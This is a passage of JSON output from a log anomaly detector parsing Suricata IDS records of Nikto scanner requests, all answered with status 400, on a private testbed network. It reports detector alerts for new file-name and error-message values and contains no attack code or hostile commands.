"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46828, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":724402052941536,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 724402052941536, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21724, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46830, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.LOG", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.217384, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46830, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2009838519995892, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80", "/parser/model/time": 1583349514.218957, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46832, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.box", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.219129, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46832, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1576347470812328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22067, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46834, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cgi+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.220821, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 